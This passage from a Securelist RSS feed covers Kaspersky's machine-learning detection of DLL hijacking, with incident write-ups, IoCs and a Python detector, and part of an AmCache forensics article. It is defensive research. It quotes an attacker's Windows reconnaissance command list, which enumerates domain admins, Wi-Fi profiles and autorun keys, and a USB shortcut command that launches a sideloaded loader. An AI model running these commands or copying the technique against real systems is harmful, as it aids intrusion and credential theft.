  1348. reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers
  1349. netsh wlan show profiles
  1350. netsh wlan show interfaces
  1351. set
  1352. net localgroup administrators
  1353. net user
  1354. net user administrator
  1355. ipconfig /all
  1356. net config workstation
  1357. net view
  1358. arp -a
  1359. route print
  1360. netstat -ano
  1361. tasklist
  1362. schtasks /query /fo LIST /v
  1363. net start
  1364. net share
  1365. net use
  1366. netsh firewall show config
  1367. netsh firewall show state
  1368. net view /domain
  1369. net time /domain
  1370. net group "domain admins" /domain
  1371. net localgroup administrators /domain
  1372. net group "domain controllers" /domain
  1373. net accounts /domain
  1374. nltest / domain_trusts
  1375. reg query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  1376. reg query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
  1377. reg query HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
  1378. reg query HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
  1379. reg query HKEY_CURRENT_USER\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce</pre><p>
  1380. Based on the attackers&#8217; TTPs, such as <a href="https://securelist.com/toddycat-keep-calm-and-check-logs/110696/" target="_blank" rel="noopener">loading Cobalt Strike as a DLL</a>, using the DLL sideloading technique (<a href="https://securelist.com/toddycat-keep-calm-and-check-logs/110696/" target="_blank" rel="noopener">1</a>, <a href="https://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/" target="_blank" rel="noopener">2</a>), and exploiting SharePoint, we can say with a high degree of confidence that the <a href="https://securelist.com/tag/toddycat/" target="_blank" rel="noopener">ToddyCat APT group</a> was behind the attack. Thanks to the prompt response of our model, we were able to respond in time and block this activity, preventing the attackers from causing damage to the organization.</p>
  1381. <h3 id="incident-2-infostealer-masquerading-as-a-policy-manager">Incident 2. Infostealer masquerading as a policy manager</h3>
  1382. <p>Another example was discovered by the model after a client was connected to MDR monitoring: a legitimate system file located in an application folder attempted to load a suspicious library that was stored next to it.</p><pre class="urvanov-syntax-highlighter-plain-tag">C:\Program Files\Chiniks\SettingSyncHost.exe
  1383. C:\Program Files\Chiniks\policymanager.dll E83F331BD1EC115524EBFF7043795BBE</pre><p>
  1384. The SettingSyncHost.exe file is a system host process for synchronizing settings between one user&#8217;s different devices. Its 32-bit and 64-bit versions are usually located in C:\Windows\System32\ and C:\Windows\SysWOW64\, respectively. In this incident, the file location differed from the normal one.</p>
  1385. <div id="attachment_117574" style="width: 877px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220932/detecting-dll-hijacking4.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117574" class="size-full wp-image-117574" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220932/detecting-dll-hijacking4.png" alt="Example of a policymanager.dll load event with a DLL Hijacking module verdict in Kaspersky SIEM" width="867" height="818" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220932/detecting-dll-hijacking4.png 867w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220932/detecting-dll-hijacking4-300x283.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220932/detecting-dll-hijacking4-768x725.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220932/detecting-dll-hijacking4-371x350.png 371w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220932/detecting-dll-hijacking4-740x698.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220932/detecting-dll-hijacking4-297x280.png 297w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27220932/detecting-dll-hijacking4-800x755.png 800w" sizes="auto, (max-width: 867px) 100vw, 867px" /></a><p id="caption-attachment-117574" class="wp-caption-text">Example of a policymanager.dll load event with a DLL Hijacking module verdict in Kaspersky SIEM</p></div>
  1386. <p>Analysis of the library file loaded by this process showed that it was malware designed to steal information from browsers.</p>
  1387. <div id="attachment_117575" style="width: 984px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221012/detecting-dll-hijacking5.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117575" class="size-full wp-image-117575" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221012/detecting-dll-hijacking5.png" alt="Graph of policymanager.dll activity in a sandbox" width="974" height="503" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221012/detecting-dll-hijacking5.png 974w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221012/detecting-dll-hijacking5-300x155.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221012/detecting-dll-hijacking5-768x397.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221012/detecting-dll-hijacking5-678x350.png 678w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221012/detecting-dll-hijacking5-740x382.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221012/detecting-dll-hijacking5-542x280.png 542w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221012/detecting-dll-hijacking5-800x413.png 800w" sizes="auto, (max-width: 974px) 100vw, 974px" /></a><p id="caption-attachment-117575" class="wp-caption-text">Graph of policymanager.dll activity in a sandbox</p></div>
  1388. <p>The file directly accesses browser files that contain user data.</p><pre class="urvanov-syntax-highlighter-plain-tag">C:\Users\&lt;user&gt;\AppData\Local\Google\Chrome\User Data\Local State</pre><p>
  1389. The library file is on the list of files used for DLL hijacking, as published in the HijackLibs project. The project contains a list of common processes and libraries employed in DLL-hijacking attacks, which can be used to detect these attacks.</p>
  1390. <h3 id="incident-3-malicious-loader-posing-as-a-security-solution">Incident 3. Malicious loader posing as a security solution</h3>
  1391. <p>Another incident discovered by our model occurred when a user connected a removable USB drive:</p>
  1392. <div id="attachment_117576" style="width: 984px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221114/detecting-dll-hijacking6.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117576" class="size-full wp-image-117576" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221114/detecting-dll-hijacking6.png" alt="Example of a Kaspersky SIEM event where a wsc.dll library was loaded from a USB drive, with a DLL Hijacking module verdict" width="974" height="894" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221114/detecting-dll-hijacking6.png 974w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221114/detecting-dll-hijacking6-300x275.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221114/detecting-dll-hijacking6-768x705.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221114/detecting-dll-hijacking6-381x350.png 381w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221114/detecting-dll-hijacking6-740x679.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221114/detecting-dll-hijacking6-305x280.png 305w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221114/detecting-dll-hijacking6-800x734.png 800w" sizes="auto, (max-width: 974px) 100vw, 974px" /></a><p id="caption-attachment-117576" class="wp-caption-text">Example of a Kaspersky SIEM event where a wsc.dll library was loaded from a USB drive, with a DLL Hijacking module verdict</p></div>
1393. <p>The root of the connected drive contained hidden folders, each paired with a visible shortcut of the same name that used a folder icon. Because Windows Explorer never displays the .lnk extension of a shortcut, the user could easily mistake a shortcut for a folder and double-click it. The shortcut then opened the corresponding hidden folder and ran an executable with the following command:</p><pre class="urvanov-syntax-highlighter-plain-tag">"%comspec%" /q /c "RECYCLER.BIN\1\CEFHelper.exe [$DIGITS] [$DIGITS]"</pre><p>
  1394. CEFHelper.exe is a legitimate Avast Antivirus executable that, through DLL sideloading, loaded the wsc.dll library, which is a malicious loader.</p>
  1395. <div id="attachment_117577" style="width: 461px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221216/detecting-dll-hijacking7.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117577" class="size-full wp-image-117577" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221216/detecting-dll-hijacking7.png" alt="Code snippet from the malicious file" width="451" height="485" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221216/detecting-dll-hijacking7.png 451w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221216/detecting-dll-hijacking7-279x300.png 279w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221216/detecting-dll-hijacking7-325x350.png 325w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/27221216/detecting-dll-hijacking7-260x280.png 260w" sizes="auto, (max-width: 451px) 100vw, 451px" /></a><p id="caption-attachment-117577" class="wp-caption-text">Code snippet from the malicious file</p></div>
  1396. <p>The loader opens a file named AvastAuth.dat, which contains an encrypted backdoor. The library reads the data from the file into memory, decrypts it, and executes it. After this, the backdoor attempts to connect to a remote command-and-control server.</p>
1397. <p>wsc.dll, the library carrying the malicious loader, is likewise listed by the HijackLibs project as a known DLL sideloading target.</p>
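<p>To make the signal behind Incidents 2 and 3 concrete, the following is an added example, not Kaspersky's model and not code from this article: a small rule set that scores module-load events by three conditions visible in both incidents (a Windows binary running outside its expected directory, a DLL from a HijackLibs-style candidate list loaded from the executable's own directory, and an executable plus DLL launched from removable media). The expected-directory table, the candidate DLL set (taken from the IoC names in this article) and the events are constructed for illustration and would be replaced by HijackLibs data and real EDR telemetry in production.</p>

```python
"""Added example (not Kaspersky's ML model): a rule-based approximation of the
DLL-hijacking signal behind Incidents 2 and 3, run over constructed load events."""
from dataclasses import dataclass
from pathlib import PureWindowsPath
from typing import Dict, List, Set

# Constructed table in the spirit of HijackLibs: where the genuine copy of a
# Windows binary lives. Only SettingSyncHost.exe is taken from the article;
# swap in the real HijackLibs expected-location data in production.
EXPECTED_DIRS: Dict[str, Set[str]] = {
    "settingsynchost.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
}
WINDOWS_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
# DLL names from the article's IoC list, used here as a HijackLibs-style
# candidate set (assumption for illustration).
SIDELOAD_CANDIDATES = {"systemsettings.dll", "policymanager.dll", "wsc.dll"}


@dataclass(frozen=True)
class ImageLoad:
    """One module-load event as an EDR/SIEM would report it (constructed)."""
    process_path: str
    module_path: str
    removable_media: bool = False   # True when the module sits on a USB drive


def _parts(path: str):
    """Return (lower-cased file name, lower-cased parent directory)."""
    p = PureWindowsPath(path)
    return p.name.lower(), str(p.parent).lower()


def evaluate(event: ImageLoad) -> List[str]:
    """Return the reasons this load looks like DLL hijacking (empty list = benign)."""
    exe, exe_dir = _parts(event.process_path)
    dll, dll_dir = _parts(event.module_path)
    same_dir = exe_dir == dll_dir
    reasons: List[str] = []

    # 1. A known Windows binary executing from somewhere it is never installed.
    expected = EXPECTED_DIRS.get(exe)
    if expected is not None and exe_dir not in expected:
        reasons.append(f"{exe} is a Windows binary but runs from {exe_dir}")

    # 2. A known sideloading target loaded from the executable's own directory,
    #    outside the Windows system directories where the real DLL lives.
    if same_dir and dll in SIDELOAD_CANDIDATES and dll_dir not in WINDOWS_DIRS:
        reasons.append(f"{dll} is a known sideloading target loaded from the executable's own directory")

    # 3. Executable and DLL both staged on removable media (Incident 3).
    if same_dir and event.removable_media:
        reasons.append("executable and module both launched from removable media")
    return reasons


# Constructed events mirroring the article's IoC paths plus a benign baseline.
SAMPLE_EVENTS = [
    ImageLoad(r"C:\ProgramData\SystemSettings.exe", r"C:\ProgramData\SystemSettings.dll"),
    ImageLoad(r"C:\Program Files\Chiniks\SettingSyncHost.exe", r"C:\Program Files\Chiniks\policymanager.dll"),
    ImageLoad(r"D:\RECYCLER.BIN\1\CEFHelper.exe", r"D:\RECYCLER.BIN\1\wsc.dll", removable_media=True),
    ImageLoad(r"C:\Windows\System32\SettingSyncHost.exe", r"C:\Windows\System32\policymanager.dll"),
]


def triage(events) -> Dict[str, List[str]]:
    """Map each suspicious process path to its reasons; benign events are omitted."""
    findings: Dict[str, List[str]] = {}
    for event in events:
        reasons = evaluate(event)
        if reasons:
            findings[event.process_path] = reasons
    return findings


if __name__ == "__main__":
    for proc, reasons in triage(SAMPLE_EVENTS).items():
        print(proc)
        for reason in reasons:
            print("   -", reason)
```

The benign baseline (SettingSyncHost.exe loading policymanager.dll from System32) produces no finding, which is the point of checking the DLL's directory against the Windows system directories: the same DLL name is legitimate there and suspicious anywhere else.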
  1398. <h2 id="conclusion">Conclusion</h2>
  1399. <p>Integrating the model into the product provided the means of early and accurate detection of DLL-hijacking attempts which previously might have gone unnoticed. Even during the pilot testing, the model proved its effectiveness by identifying several incidents using this technique. Going forward, its accuracy will only increase as data accumulates and algorithms are updated in KSN, making this mechanism a reliable element of proactive protection for corporate systems.</p>
  1400. <h2 id="ioc">IoC</h2>
  1401. <p><strong>Legitimate files used for DLL hijacking<br />
  1402. </strong>E0E092D4EFC15F25FD9C0923C52C33D6 loads SystemSettings.dll<br />
  1403. 09CD396C8F4B4989A83ED7A1F33F5503 loads policymanager.dll<br />
  1404. A72036F635CECF0DCB1E9C6F49A8FA5B loads wsc.dll</p>
  1405. <p><strong>Malicious files</strong><br />
  1406. <a href="https://opentip.kaspersky.com/ea2882b05f8c11a285426f90859f23c6/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______20de3dc00773942a&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">EA2882B05F8C11A285426F90859F23C6</a>   SystemSettings.dll<br />
  1407. <a href="https://opentip.kaspersky.com/e83f331bd1ec115524ebff7043795bbe/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______cbf93adf43b574f2&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">E83F331BD1EC115524EBFF7043795BBE</a>   policymanager.dll<br />
  1408. <a href="https://opentip.kaspersky.com/831252e7fa9bd6fa174715647ebce516/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______01488fcf88e4ecaf&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">831252E7FA9BD6FA174715647EBCE516</a>   wsc.dll</p>
  1409. <p><strong>Paths</strong><br />
  1410. C:\ProgramData\SystemSettings.exe<br />
  1411. C:\ProgramData\SystemSettings.dll<br />
  1412. C:\Program Files\Chiniks\SettingSyncHost.exe<br />
  1413. C:\Program Files\Chiniks\policymanager.dll<br />
  1414. D:\RECYCLER.BIN\1\CEFHelper.exe<br />
  1415. D:\RECYCLER.BIN\1\wsc.dll</p>
  1416. ]]></content:encoded>
  1417. <wfw:commentRss>https://securelist.com/detecting-dll-hijacking-with-machine-learning-in-kaspersky-siem/117567/feed/</wfw:commentRss>
  1418. <slash:comments>0</slash:comments>
  1419. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30120509/SL-DLL-Hicjacking-detection-featured.jpg" width="2000" height="1000"><media:keywords>full</media:keywords></media:content>
  1420. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30120509/SL-DLL-Hicjacking-detection-featured-1024x512.jpg" width="1024" height="512"><media:keywords>large</media:keywords></media:content>
  1421. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30120509/SL-DLL-Hicjacking-detection-featured-300x150.jpg" width="300" height="150"><media:keywords>medium</media:keywords></media:content>
  1422. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30120509/SL-DLL-Hicjacking-detection-featured-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  1423. </item>
  1424. <item>
  1425. <title>Forensic journey: hunting evil within AmCache</title>
  1426. <link>https://securelist.com/amcache-forensic-artifact/117622/</link>
  1427. <comments>https://securelist.com/amcache-forensic-artifact/117622/#respond</comments>
  1428. <dc:creator><![CDATA[Cristian Souza]]></dc:creator>
  1429. <pubDate>Wed, 01 Oct 2025 10:00:20 +0000</pubDate>
  1430. <category><![CDATA[SOC, TI and IR posts]]></category>
  1431. <category><![CDATA[Digital forensics]]></category>
  1432. <category><![CDATA[Threat hunting]]></category>
  1433. <category><![CDATA[Researchers tools]]></category>
  1434. <category><![CDATA[Incident response]]></category>
  1435. <category><![CDATA[Forensic journey]]></category>
  1436. <category><![CDATA[Cybersecurity]]></category>
  1437. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=117622</guid>
  1438.  
  1439. <description><![CDATA[Kaspersky experts share insights into how AmCache may prove useful during incident investigation, and provide a command line tool to extract data from this artifact.]]></description>
  1440. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/01111328/SL-AmCache-forensic-artifact-featured-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><h2 id="introduction">Introduction</h2>
  1441. <p>When it comes to digital forensics, AmCache plays a vital role in identifying malicious activities in Windows systems. This artifact allows the identification of the execution of both benign and malicious software on a machine. It is managed by the operating system, and at the time of writing this article, there is no known way to modify or remove AmCache data. Thus, in an incident response scenario, it could be the key to identifying lost artifacts (e.g., ransomware that auto-deletes itself), allowing analysts to search for patterns left by the attacker, such as file names and paths. Furthermore, AmCache stores the SHA-1 hashes of executed files, which allows DFIR professionals to search public threat intelligence feeds — such as <a href="https://opentip.kaspersky.com/" target="_blank" rel="noopener">OpenTIP</a> and <a href="https://www.virustotal.com/gui/" target="_blank" rel="noopener">VirusTotal</a> — and generate rules for blocking this same file on other systems across the network.</p>
1442. <p>This article presents a comprehensive analysis of the AmCache artifact, allowing readers to better understand its inner workings. In addition, we present a new tool named &#8220;<a href="https://github.com/cristianzsh/amcache-evilhunter" target="_blank" rel="noopener">AmCache-EvilHunter</a>&#8221;, which any professional can use to parse the <code>Amcache.hve</code> file and extract IOCs. The tool can also query the aforementioned intelligence feeds to check for malicious file detections; this built-in automation reduces manual effort and speeds up threat detection, which is of significant value for analysts and responders.</p>
  1443. <h2 id="the-importance-of-evidence-of-execution">The importance of evidence of execution</h2>
  1444. <p>Evidence of execution is fundamentally important in digital forensics and incident response, since it helps investigators reconstruct how the system was used during an intrusion. Artifacts such as Prefetch, ShimCache, and <a href="https://securelist.com/userassist-artifact-forensic-value-for-incident-response/116911/" target="_blank" rel="noopener">UserAssist</a> offer clues about what was executed. AmCache is also a robust artifact for evidencing execution, preserving metadata that indicates a file&#8217;s presence and execution, even if the file has been deleted or modified. An advantage of AmCache over other Windows artifacts is that unlike them, it stores the file hash, which is immensely useful for analysts, as it can be used to hunt malicious files across the network, increasing the likelihood of fully identifying, containing, and eradicating the threat.</p>
  1445. <h2 id="introduction-to-amcache">Introduction to AmCache</h2>
  1446. <p>Application Activity Cache (AmCache) was first introduced in Windows 7 and fully leveraged in Windows 8 and beyond. Its purpose is to replace the older <code>RecentFileCache.bcf</code> in newer systems. Unlike its predecessor, AmCache includes valuable forensic information about program execution, executed binaries and loaded drivers.</p>
  1447. <p>This artifact is stored as a registry hive file named <code>Amcache.hve</code> in the directory <code>C:\Windows\AppCompat\Programs</code>. The metadata stored in this file includes file paths, publisher data, compilation timestamps, file sizes, and SHA-1 hashes.</p>
  1448. <p>It is important to highlight that the AmCache format does not depend on the operating system version, but rather on the version of the libraries (DLLs) responsible for filling the cache. In this way, even Windows systems with different patch levels could have small differences in the structure of the AmCache files. The known libraries used for filling this cache are stored under <code>%WinDir%\System32</code> with the following names:</p>
  1449. <ul>
  1450. <li>aecache.dll</li>
  1451. <li>aeevts.dll</li>
  1452. <li>aeinv.dll</li>
  1453. <li>aelupsvc.dll</li>
  1454. <li>aepdu.dll</li>
  1455. <li>aepic.dll</li>
  1456. </ul>
1457. <p>It is worth noting that this artifact has its peculiarities and limitations. AmCache computes the SHA-1 hash over only the first 31,457,280 bytes (30 MiB, ≈31 MB) of each executable, so the stored hash of a larger file will not match the full-file hash that online portals index. Furthermore, <code>Amcache.hve</code> is not a true execution log: it records files in directories scanned by the Microsoft Compatibility Appraiser, executables and drivers copied during program execution, and GUI applications that required compatibility shimming. Only the last category reliably indicates actual execution. Items in the first two groups simply confirm file presence on the system, with no data on whether or when they ran.</p>
  1458. <p>In the same directory, we can find additional LOG files used to ensure <code>Amcache.hve</code> consistency and recovery operations:</p>
  1459. <ul>
  1460. <li>C:\Windows\AppCompat\Programs\Amcache.hve.*LOG1</li>
  1461. <li>C:\Windows\AppCompat\Programs\Amcache.hve.*LOG2</li>
  1462. </ul>
  1463. <p>The <code>Amcache.hve</code> file can be collected from a system for forensic analysis using tools like <a href="https://github.com/abaghinyan/aralez" target="_blank" rel="noopener">Aralez</a>, <a href="https://docs.velociraptor.app/downloads/" target="_blank" rel="noopener">Velociraptor</a>, or <a href="https://www.sans.org/tools/kape" target="_blank" rel="noopener">Kape</a>.</p>
  1464. <h2 id="amcache-hve-structure">Amcache.hve structure</h2>
<p>The <code>Amcache.hve</code> file is a Windows Registry hive in REGF format; it contains multiple subkeys that store distinct classes of data. A simple Python parser can be implemented to iterate through <code>Amcache.hve</code> and present its keys:</p><pre class="urvanov-syntax-highlighter-plain-tag">#!/usr/bin/env python3
# Lists the top-level keys of an Amcache.hve hive.
# Requires the python-registry package (pip install python-registry).
# Usage: python3 script.py /path/to/Amcache.hve

import sys
from Registry.Registry import Registry

hive = Registry(sys.argv[1])
root = hive.open("Root")

# Each subkey of Root holds one class of inventory data (applications, files, drivers, ...)
for rec in root.subkeys():
    print(rec.name())</pre><p>
  1475. The result of this parser when executed is:</p>
  1476. <div id="attachment_117624" style="width: 1667px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30163530/amcache-forensic-artifact1.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117624" class="size-full wp-image-117624" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30163530/amcache-forensic-artifact1.png" alt="AmCache keys" width="1657" height="796" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30163530/amcache-forensic-artifact1.png 1657w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30163530/amcache-forensic-artifact1-300x144.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30163530/amcache-forensic-artifact1-1024x492.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30163530/amcache-forensic-artifact1-768x369.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30163530/amcache-forensic-artifact1-1536x738.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30163530/amcache-forensic-artifact1-729x350.png 729w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30163530/amcache-forensic-artifact1-740x355.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30163530/amcache-forensic-artifact1-583x280.png 583w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30163530/amcache-forensic-artifact1-800x384.png 800w" sizes="auto, (max-width: 1657px) 100vw, 1657px" /></a><p id="caption-attachment-117624" class="wp-caption-text">AmCache keys</p></div>
  1477. <p>From a DFIR perspective, the keys that are of the most interest to us are <code>InventoryApplicationFile</code>, <code>InventoryApplication</code>, <code>InventoryDriverBinary</code>, and <code>InventoryApplicationShortcut</code>, which are described in detail in the following subsections.</p>
  1478. <h3 id="inventoryapplicationfile">InventoryApplicationFile</h3>
  1479. <p>The <code>InventoryApplicationFile</code> key is essential for tracking every executable discovered on the system. Under this key, each executable is represented by its own uniquely named subkey, which stores the following main metadata:</p>
  1480. <ul>
1481. <li><strong>ProgramId:</strong> a unique hash generated from the binary name, version, publisher, and language, prefixed with several zeroes</li>
1482. <li><strong>FileID:</strong> the SHA-1 hash of the file, prefixed with four zeroes ("0000")</li>
  1483. <li><strong>LowerCaseLongPath:</strong> the full lowercase path to the executable</li>
  1484. <li><strong>Name:</strong> the file base name without the path information</li>
  1485. <li><strong>OriginalFileName:</strong> the original filename as specified in the PE header&#8217;s version resource, indicating the name assigned by the developer at build time</li>
1486. <li><strong>Publisher:</strong> often used to verify whether the binary comes from a legitimate source. For malware, this value is usually empty</li>
  1487. <li><strong>Version:</strong> the specific build or release version of the executable</li>
  1488. <li><strong>BinaryType:</strong> indicates whether the executable is a 32-bit or 64-bit binary</li>
  1489. <li><strong>ProductName:</strong> the ProductName field from the version resource, describing the broader software product or suite to which the executable belongs</li>
  1490. <li><strong>LinkDate: </strong>the compilation timestamp extracted from the PE header</li>
  1491. <li><strong>Size:</strong> the file size in bytes</li>
  1492. <li><strong>IsOsComponent:</strong> a boolean flag that specifies whether the executable is a built-in OS component or a third-party application/library</li>
  1493. </ul>
<p>With some tweaks to our original Python parser, we can read the information stored within this key:</p><pre class="urvanov-syntax-highlighter-plain-tag">#!/usr/bin/env python3
# Dumps every record under Root\InventoryApplicationFile as a dict of value name -> value.
# Requires the python-registry package (pip install python-registry).
# Usage: python3 script.py /path/to/Amcache.hve

import sys
from Registry.Registry import Registry

hive = Registry(sys.argv[1])
root = hive.open("Root")

subs = {k.name(): k for k in root.subkeys()}
parent = subs.get("InventoryApplicationFile")
if parent is None:
    sys.exit("InventoryApplicationFile key not found in this hive")

# One subkey per discovered executable; its values carry the metadata listed above
for rec in parent.subkeys():
    vals = {v.name(): v.value() for v in rec.values()}
    print("{}\n{}\n\n-----------\n".format(rec, vals))</pre><p>
  1508. <div id="attachment_117625" style="width: 1345px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30163907/amcache-forensic-artifact2.jpeg" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117625" class="size-full wp-image-117625" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30163907/amcache-forensic-artifact2.jpeg" alt="InventoryApplicationFile subkeys" width="1335" height="560" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30163907/amcache-forensic-artifact2.jpeg 1335w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30163907/amcache-forensic-artifact2-300x126.jpeg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30163907/amcache-forensic-artifact2-1024x430.jpeg 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30163907/amcache-forensic-artifact2-768x322.jpeg 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30163907/amcache-forensic-artifact2-834x350.jpeg 834w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30163907/amcache-forensic-artifact2-740x310.jpeg 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30163907/amcache-forensic-artifact2-668x280.jpeg 668w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30163907/amcache-forensic-artifact2-800x336.jpeg 800w" sizes="auto, (max-width: 1335px) 100vw, 1335px" /></a><p id="caption-attachment-117625" class="wp-caption-text">InventoryApplicationFile subkeys</p></div>
  1509. <p>We can also use tools like Registry Explorer to see the same data in a graphical way:</p>
  1510. <div id="attachment_117626" style="width: 1295px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164000/amcache-forensic-artifact3.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117626" class="size-full wp-image-117626" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164000/amcache-forensic-artifact3.png" alt="InventoryApplicationFile inspected through Registry Explorer" width="1285" height="546" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164000/amcache-forensic-artifact3.png 1285w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164000/amcache-forensic-artifact3-300x127.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164000/amcache-forensic-artifact3-1024x435.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164000/amcache-forensic-artifact3-768x326.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164000/amcache-forensic-artifact3-824x350.png 824w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164000/amcache-forensic-artifact3-740x314.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164000/amcache-forensic-artifact3-659x280.png 659w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30164000/amcache-forensic-artifact3-800x340.png 800w" sizes="auto, (max-width: 1285px) 100vw, 1285px" /></a><p id="caption-attachment-117626" class="wp-caption-text">InventoryApplicationFile inspected 